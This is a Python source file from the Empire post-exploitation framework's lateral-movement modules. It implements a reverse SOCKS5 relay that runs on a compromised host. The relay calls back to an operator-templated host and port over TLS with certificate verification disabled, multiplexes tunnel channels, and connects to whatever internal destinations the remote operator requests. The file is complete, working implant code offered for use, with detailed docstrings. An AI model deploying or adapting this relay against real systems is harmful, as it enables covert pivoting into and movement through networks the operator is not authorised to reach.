# Empire/data/module_source/python/lateral_movement/socks_source.py
# (original listing: 438 lines, 14 KiB, Python)

#from __future__ import unicode_literals, division
import select
import socket
import ssl
import struct
import sys
import threading
class MessageType(object):
    """Closed set of frame types carried in a tunnel message header."""

    Control = 0
    Data = 1
    OpenChannel = 2
    CloseChannel = 3

    @classmethod
    def validate(cls, arg):
        """Return *arg* unchanged when it names a known message type.

        :raises TypeError: if *arg* is not an ``int`` or falls outside the
            ``Control`` .. ``CloseChannel`` range.
        """
        is_known = isinstance(arg, int) and MessageType.Control <= arg <= MessageType.CloseChannel
        if is_known:
            return arg
        raise TypeError()
class Message(object):
    """One frame on the tunnel transport: a fixed header followed by ``body``.

    The header is packed with ``HDR_STRUCT`` in network byte order: an
    unsigned byte message type, an unsigned short channel id and an unsigned
    int body length (``HDR_SIZE`` bytes in total).
    """

    HDR_STRUCT = b'!BHI'
    HDR_SIZE = struct.calcsize(HDR_STRUCT)

    def __init__(self, body, channel_id, msg_type=MessageType.Data):
        """Create a frame carrying *body* (bytes) on channel *channel_id*."""
        self.body, self._channel_id, self.msg_type = body, channel_id, msg_type

    @property
    def channel_id(self):
        """Id of the channel this frame belongs to (read-only)."""
        return self._channel_id

    @classmethod
    def parse_hdr(cls, data):
        """Unpack the header found at the start of *data*.

        :returns: ``(msg_type, channel_id, length)``.
        :raises struct.error: if *data* is shorter than the header.
        :raises TypeError: if the message type is not a known ``MessageType``.
        """
        header_len = struct.calcsize(cls.HDR_STRUCT)
        fields = struct.unpack(cls.HDR_STRUCT, data[:header_len])
        MessageType.validate(fields[0])
        return fields

    @classmethod
    def parse(cls, data):
        """Build a ``Message`` from one complete serialized frame.

        :raises ValueError: if *data* is shorter than the header, or the body
            length differs from the header's length field.
        :raises TypeError: if the message type is not a known ``MessageType``.
        """
        header, body = data[:cls.HDR_SIZE], data[cls.HDR_SIZE:]
        if len(header) < cls.HDR_SIZE:
            raise ValueError()
        msg_type, channel_id, length = cls.parse_hdr(header)
        if len(body) != length:
            raise ValueError()
        # parse_hdr has already validated msg_type.
        return Message(body, channel_id, msg_type=msg_type)

    def serialize(self):
        """Return the wire form: the packed header followed by ``body``."""
        header = struct.pack(self.HDR_STRUCT, self.msg_type, self.channel_id, len(self.body))
        return header + self.body
class Channel(object):
    """A single tunnelled stream backed by a connected local socket pair.

    ``client_interface`` is the end used by the stream's consumer, and
    ``tunnel_interface`` is the end the owning ``Tunnel`` reads and writes.
    ``tx`` and ``rx`` count the bytes moved through ``send`` and ``recv``.
    """

    def __init__(self, channel_id):
        client_end, tunnel_end = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
        self._channel_id = channel_id
        self._client_end = client_end
        self._tunnel_end = tunnel_end
        self.tx = 0
        self.rx = 0

    @property
    def tunnel_interface(self):
        """Socket end serviced by the Tunnel."""
        return self._tunnel_end

    @property
    def client_interface(self):
        """Socket end handed to the stream's consumer."""
        return self._client_end

    @property
    def channel_id(self):
        """Numeric id of this channel (read-only)."""
        return self._channel_id

    def fileno(self):
        """Client-end descriptor, so a Channel can be passed to ``select``."""
        return self._client_end.fileno()

    def close(self):
        """Close the client end only; the tunnel end is closed by its owner."""
        self._client_end.close()

    def send(self, data, flags=0):
        """Write all of *data* to the client end and add it to ``tx``."""
        self._client_end.sendall(data, flags)
        self.tx += len(data)

    def recv(self, length):
        """Read up to *length* bytes from the client end.

        Any error is reported as ``b''`` (end of stream); only successful
        reads are counted in ``rx``.
        """
        try:
            chunk = self._client_end.recv(length)
        except Exception:
            return b''
        self.rx += len(chunk)
        return chunk
class Tunnel(object):
    """Multiplex numbered channels over a single transport socket.

    Each open channel is a ``Channel`` (a local socket pair).  The constructor
    starts a daemon thread running ``_monitor``, which

    * reads framed ``Message`` objects from the transport and applies them
      (open a channel, close a channel, or deliver data to a channel), and
    * reads bytes written into each channel locally and forwards them to the
      transport as ``Data`` messages.
    """

    def __init__(self, sock, open_channel_callback=None, close_channel_callback=None):
        """Start monitoring *sock*.

        :param sock: connected transport socket (plain or TLS-wrapped).
        :param open_channel_callback: called with each newly opened
            ``Channel``; defaults to a no-op.
        :param close_channel_callback: called with each ``Channel`` after it
            has been closed; defaults to a no-op.
        """
        self.transport = sock
        # Serializes writes to the transport so frames sent from different
        # threads are never interleaved on the wire.
        self.transport_lock = threading.Lock()
        # Open channels as (Channel, channel_id) pairs.
        self.channels = []
        # channel_id -> Channel for channels that have been closed.
        self.closed_channels = {}
        if open_channel_callback is None:
            self.open_channel_callback = lambda x: None
        else:
            self.open_channel_callback = open_channel_callback
        if close_channel_callback is None:
            self.close_channel_callback = lambda x: None
        else:
            self.close_channel_callback = close_channel_callback
        self.monitor_thread = threading.Thread(target=self._monitor)
        self.monitor_thread.daemon = True
        self.monitor_thread.start()

    def wait(self):
        """Block until the monitor thread exits."""
        self.monitor_thread.join()

    @property
    def channel_id_map(self):
        """Snapshot dict mapping Channel -> channel_id for open channels."""
        return {x: y for x, y in self.channels}

    @property
    def id_channel_map(self):
        """Snapshot dict mapping channel_id -> Channel for open channels."""
        return {y: x for x, y in self.channels}

    def _send_message(self, message):
        """Serialize *message* and write it to the transport under the lock.

        The lock is held with ``with`` so it is released even when
        ``sendall`` raises; a bare acquire/release would leave it held and
        block every later sender forever.
        """
        data = message.serialize()
        with self.transport_lock:
            self.transport.sendall(data)

    def _close_channel_remote(self, channel_id):
        """Send a CloseChannel message for *channel_id* to the remote end."""
        self._send_message(Message(b'', channel_id, msg_type=MessageType.CloseChannel))

    def close_channel(self, channel_id, close_remote=False, exc=False):
        """Close *channel_id* locally and optionally notify the remote end.

        :param close_remote: also send a CloseChannel message.  For an id that
            is already in ``closed_channels`` only that message is (re)sent;
            for an id that was never opened nothing is sent.
        :param exc: raise ``ValueError`` instead of returning silently when the
            id is neither open nor previously closed.
        """
        if channel_id in self.closed_channels:
            if close_remote:
                self._close_channel_remote(channel_id)
            return
        # Single snapshot lookup: two separate lookups could race with
        # another thread removing the channel in between.
        channel = self.id_channel_map.get(channel_id)
        if channel is None:
            if exc:
                raise ValueError()
            return
        try:
            self.channels.remove((channel, channel_id))
        except ValueError:
            # Another thread removed it first and is finishing the close.
            return
        channel.close()
        channel.tunnel_interface.close()
        if close_remote:
            self._close_channel_remote(channel_id)
        self.close_channel_callback(channel)
        self.closed_channels[channel_id] = channel

    def close_tunnel(self):
        """Close every open channel (notifying the remote) and the transport."""
        try:
            # Iterate over a copy: close_channel removes entries from
            # self.channels, and mutating a list while iterating over it
            # skips every other element.
            for _channel, channel_id in list(self.channels):
                self.close_channel(channel_id, close_remote=True)
        finally:
            self.transport.close()

    def _open_channel_remote(self, channel_id):
        """Send an OpenChannel message for *channel_id* to the remote end."""
        self._send_message(Message(b'', channel_id, MessageType.OpenChannel))

    def open_channel(self, channel_id, open_remote=False, exc=False):
        """Open (or return the already-open) channel *channel_id*.

        :param open_remote: also send an OpenChannel message.
        :param exc: raise ``ValueError`` if the channel is already open
            instead of returning the existing one.
        :returns: the ``Channel``.
        """
        existing = self.id_channel_map.get(channel_id)
        if existing is not None:
            if exc:
                raise ValueError()
            return existing
        channel = Channel(channel_id)
        self.channels.append((channel, channel_id))
        # A reopened id is no longer closed.  Without this, close_channel
        # would take its "already closed" path and never close this channel.
        self.closed_channels.pop(channel_id, None)
        if open_remote:
            self._open_channel_remote(channel_id)
        self.open_channel_callback(channel)
        return channel

    def _recv_exact(self, size):
        """Read exactly *size* bytes from the transport.

        :raises ValueError: if the transport reaches EOF first.
        """
        chunks = []
        received = 0
        while received < size:
            chunk = self.transport.recv(size - received)
            if not chunk:
                raise ValueError()
            chunks.append(chunk)
            received += len(chunk)
        return b''.join(chunks)

    def recv_message(self):
        """Read one complete ``Message`` from the transport.

        :raises ValueError: on EOF before a full frame was read.
        :raises TypeError: if the frame's message type is unknown.
        """
        header = self._recv_exact(Message.HDR_SIZE)
        msg_type, channel_id, length = Message.parse_hdr(header)
        return Message(self._recv_exact(length), channel_id, msg_type)

    def _transport_closed(self):
        """Return True if the transport socket has been closed."""
        try:
            return self.transport.fileno() == -1
        except socket.error:
            return True

    def _transport_pending(self):
        """Return True if the transport holds already-decrypted TLS bytes.

        ``select`` only watches the raw socket.  Frames that an ``SSLSocket``
        has already decrypted into its buffer would otherwise sit unread until
        more network data arrived.  Plain sockets have no ``pending``.
        """
        pending = getattr(self.transport, 'pending', None)
        return pending is not None and pending() > 0

    def _handle_message(self, message, ignored_channels):
        """Apply one *message* received from the transport."""
        if message.msg_type == MessageType.CloseChannel:
            self.close_channel(message.channel_id)
            ignored_channels.append(message.channel_id)
        elif message.msg_type == MessageType.OpenChannel:
            self.open_channel(message.channel_id)
        elif message.msg_type == MessageType.Data:
            channel = self.id_channel_map.get(message.channel_id)
            if channel is None:
                # close_channel only sends the remote close for ids found in
                # closed_channels; unknown ids are ignored.
                self.close_channel(message.channel_id, close_remote=True)
                return
            try:
                channel.tunnel_interface.sendall(message.body)
            except socket.error:
                self.close_channel(message.channel_id, close_remote=True)
        # Control messages pass MessageType.validate but are not acted on.

    def _forward_channel_data(self, readable, ignored_channels):
        """Forward one chunk from each readable channel to the transport.

        Transport write errors propagate to the caller.
        """
        by_iface = {channel.tunnel_interface: channel for channel, _ in self.channels}
        for iface in readable:
            if iface is self.transport:
                continue
            channel = by_iface.get(iface)
            if channel is None or channel.channel_id in ignored_channels:
                continue
            try:
                data = iface.recv(4096)
            except Exception:
                data = b''
            if not data:
                # Local side closed or errored: close here and remotely.
                self.close_channel(channel.channel_id, close_remote=True)
                continue
            self._send_message(Message(data, channel.channel_id, MessageType.Data))

    def _monitor(self):
        """Pump data between the transport and channels until the transport fails."""
        while True:
            read_fds = [channel.tunnel_interface for channel, _ in self.channels] + [self.transport]
            try:
                readable, _, _ = select.select(read_fds, [], [], 1)
            except Exception:
                # Usually a channel socket closed by another thread after
                # read_fds was built, so rebuild and retry.  If the transport
                # itself is closed, retrying would spin forever.
                if self._transport_closed():
                    return
                continue
            if not readable:
                continue
            # Channels closed by the remote during this pass; any data still
            # readable from them locally is dropped.
            ignored_channels = []
            try:
                if self.transport in readable:
                    while True:
                        try:
                            message = self.recv_message()
                        except (ValueError, TypeError):
                            # EOF mid-frame or unknown message type: the stream
                            # can no longer be trusted, so stop monitoring.
                            return
                        self._handle_message(message, ignored_channels)
                        if not self._transport_pending():
                            break
                # Service channels on every pass, even when the transport was
                # readable; otherwise a busy inbound stream starves outbound data.
                self._forward_channel_data(readable, ignored_channels)
            except socket.error:
                # Reading from or writing to the transport failed.
                return

    def proxy_sock_channel(self, sock, channel, logger):
        """Relay bytes between *sock* and *channel* until either side ends.

        :param sock: connected socket to the destination.
        :param channel: the ``Channel`` paired with *sock*.
        :param logger: unused; kept for interface compatibility.

        On EOF or an error on either side, the channel is closed locally and
        remotely.  The function also returns when the channel is closed
        elsewhere.  *sock* is closed on every exit path.
        """
        def forward(read, write):
            """Move one chunk from *read* to *write*; False when the stream ended or failed."""
            try:
                data = read(4096)
            except Exception:
                return False
            if not data:
                return False
            try:
                write(data)
            except Exception:
                return False
            return True

        try:
            while (channel, channel.channel_id) in self.channels:
                try:
                    readable, _, _ = select.select([channel, sock], [], [], 1)
                except Exception:
                    # Typically the channel was closed by the monitor thread.
                    return
                if channel in readable and not forward(channel.recv, sock.sendall):
                    self.close_channel(channel.channel_id, close_remote=True)
                    return
                if sock in readable and not forward(sock.recv, channel.send):
                    self.close_channel(channel.channel_id, close_remote=True)
                    return
        finally:
            sock.close()
class Socks5Proxy(object):
    """Server side of a minimal SOCKS5 handshake (RFC 1928).

    Only the "no authentication" method and the CONNECT command are
    supported.  Every failure path sends an error reply to the client (best
    effort), closes the client socket and raises ``ValueError``.
    """

    # RFC 1928 section 6 reply codes.
    _REP_SUCCEEDED = 0x00
    _REP_GENERAL_FAILURE = 0x01
    _REP_CONNECTION_REFUSED = 0x05
    _REP_COMMAND_NOT_SUPPORTED = 0x07
    _REP_ADDRESS_TYPE_NOT_SUPPORTED = 0x08

    @staticmethod
    def _reply(sock, rep, af=socket.AF_INET, bind_addr=('0.0.0.0', 0)):
        """Send a complete SOCKS5 reply with code *rep* and bind address *bind_addr*."""
        atyp = 0x01 if af == socket.AF_INET else 0x04
        # getsockname() may include an IPv6 zone suffix ("%eth0"), which
        # inet_pton rejects.
        host = bind_addr[0].split('%', 1)[0]
        sock.sendall(struct.pack('!BBBB', 0x05, rep, 0x00, atyp)
                     + socket.inet_pton(af, host)
                     + struct.pack('!H', bind_addr[1]))

    @staticmethod
    def _fail(sock, rep, af=socket.AF_INET):
        """Send error reply *rep* (best effort), close *sock* and raise ValueError."""
        unspecified = ('0.0.0.0', 0) if af == socket.AF_INET else ('::', 0)
        try:
            Socks5Proxy._reply(sock, rep, af, unspecified)
        except socket.error:
            pass  # client already gone; still close and report the failure
        sock.close()
        raise ValueError()

    @staticmethod
    def _remote_connect(remote_host, remote_port, sock, af=socket.AF_INET):
        """Connect to the destination and report the outcome to the client.

        :returns: the connected destination socket.
        :raises ValueError: if the connection fails.  A "connection refused"
            reply has then been sent and *sock* closed.
        """
        remote_socket = socket.socket(af, socket.SOCK_STREAM)
        try:
            remote_socket.connect((remote_host, remote_port))
        except Exception:
            remote_socket.close()
            Socks5Proxy._fail(sock, Socks5Proxy._REP_CONNECTION_REFUSED, af)
        try:
            Socks5Proxy._reply(sock, Socks5Proxy._REP_SUCCEEDED, af, remote_socket.getsockname())
        except Exception:
            remote_socket.close()
            raise
        return remote_socket

    @classmethod
    def _parse_destination(cls, sock, request, atyp):
        """Decode DST.ADDR and DST.PORT from a CONNECT *request*.

        :returns: ``(address_family, host, port)``.
        :raises ValueError: for truncated or unsupported address data (after
            replying and closing *sock*).
        """
        if atyp == 0x01:
            if len(request) < 10:
                cls._fail(sock, cls._REP_GENERAL_FAILURE)
            port, = struct.unpack('!H', request[8:10])
            return socket.AF_INET, socket.inet_ntop(socket.AF_INET, request[4:8]), port
        if atyp == 0x03:
            if len(request) < 5:
                cls._fail(sock, cls._REP_GENERAL_FAILURE)
            length, = struct.unpack('B', request[4:5])
            end = 5 + length + 2
            if len(request) < end:
                cls._fail(sock, cls._REP_GENERAL_FAILURE)
            try:
                host = request[5:5 + length].decode()
            except UnicodeDecodeError:
                cls._fail(sock, cls._REP_GENERAL_FAILURE)
            port, = struct.unpack('!H', request[end - 2:end])
            # Domain names are connected over IPv4 only.
            return socket.AF_INET, host, port
        if atyp == 0x04:
            if len(request) < 22:
                cls._fail(sock, cls._REP_GENERAL_FAILURE)
            port, = struct.unpack('!H', request[20:22])
            return socket.AF_INET6, socket.inet_ntop(socket.AF_INET6, request[4:20]), port
        cls._fail(sock, cls._REP_ADDRESS_TYPE_NOT_SUPPORTED)

    @classmethod
    def new_connect(cls, sock):
        """Run the SOCKS5 handshake on *sock* and connect to the requested target.

        :param sock: socket connected to the SOCKS client.
        :returns: ``(remote_sock, (addr, port))``.
        :raises ValueError: on any handshake or connection failure.  An error
            reply has been sent (best effort) and *sock* closed.
        """
        # Method negotiation: the offered methods are not inspected, and
        # "no authentication required" (0x00) is always selected.
        # NOTE(review): each message is assumed to arrive in a single recv();
        # a request split across reads is rejected as truncated.
        sock.recv(4096)
        sock.sendall(struct.pack('BB', 0x05, 0x00))
        request = sock.recv(4096)
        if len(request) < 4:
            cls._fail(sock, cls._REP_GENERAL_FAILURE)
        ver, cmd, _rsv, atyp = struct.unpack('!BBBB', request[:4])
        if ver != 0x05:
            cls._fail(sock, cls._REP_GENERAL_FAILURE)
        if cmd != 0x01:
            cls._fail(sock, cls._REP_COMMAND_NOT_SUPPORTED)
        addr_type, addr, port = cls._parse_destination(sock, request, atyp)
        remote_sock = cls._remote_connect(addr, port, sock, af=addr_type)
        return remote_sock, (addr, port)
class Relay(object):
    """Connect to the tunnel server and serve SOCKS5 on every channel it opens."""

    def __init__(self, connect_host, connect_port, no_ssl=False):
        """Prepare (but do not connect) the tunnel socket.

        :param connect_host: host of the tunnel server.
        :param connect_port: port of the tunnel server.
        :param no_ssl: use plain TCP instead of TLS.

        Exits the process with status -1 if TLS setup raises ``ssl.SSLError``.
        """
        self.no_ssl = no_ssl
        self.connect_server = (connect_host, connect_port)
        self.tunnel = None
        self.tunnel_sock = socket.socket()
        if not no_ssl:
            try:
                self.tunnel_sock = self._wrap_tls(self.tunnel_sock)
            except ssl.SSLError:
                sys.exit(-1)

    @staticmethod
    def _wrap_tls(sock):
        """Wrap *sock* for TLS with no certificate or hostname verification.

        This mirrors the defaults of ``ssl.wrap_socket`` (``CERT_NONE``, no
        SNI), which this class used before; that helper was removed in Python
        3.12.  The peer certificate is therefore NOT verified.
        """
        if not hasattr(ssl, 'SSLContext'):
            # Very old interpreters (< 2.7.9) only have the legacy helper.
            return ssl.wrap_socket(sock)
        protocol = getattr(ssl, 'PROTOCOL_TLS_CLIENT', None)
        if protocol is None:
            protocol = ssl.PROTOCOL_SSLv23
        context = ssl.SSLContext(protocol)
        # check_hostname must be disabled before verify_mode can be CERT_NONE.
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        return context.wrap_socket(sock)

    def _handle_channel(self, channel):
        """Run the SOCKS5 handshake on *channel*, then proxy it to the target."""
        try:
            sock, _addr = Socks5Proxy.new_connect(channel.client_interface)
        except Exception:
            # The handshake failed before a destination socket existed; tear
            # the channel down on both ends.
            self.tunnel.close_channel(channel.channel_id, close_remote=True)
            return
        self.tunnel.proxy_sock_channel(sock, channel, None)

    def open_channel_callback(self, channel):
        """Handle each newly opened channel on its own daemon thread."""
        t = threading.Thread(target=self._handle_channel, args=(channel,))
        t.daemon = True
        t.start()

    def run(self):
        """Connect to the tunnel server and block until the tunnel ends.

        Returns immediately, after closing the socket, if the connection fails.
        """
        try:
            self.tunnel_sock.connect(self.connect_server)
        except Exception:
            self.tunnel_sock.close()
            return
        self.tunnel = Tunnel(self.tunnel_sock, open_channel_callback=self.open_channel_callback)
        self.tunnel.wait()
# Entry point.  ${host}, ${port} and ${no_ssl} are template placeholders that
# must be substituted before this script runs (the file is not valid Python
# until then).  They become Relay's connect_host, connect_port and no_ssl
# arguments -- confirm against whatever renders this template.
relay = Relay('${host}', ${port}, no_ssl=${no_ssl})
# Blocks until the tunnel's monitor thread exits; returns at once if the
# connection to the tunnel server fails.
relay.run()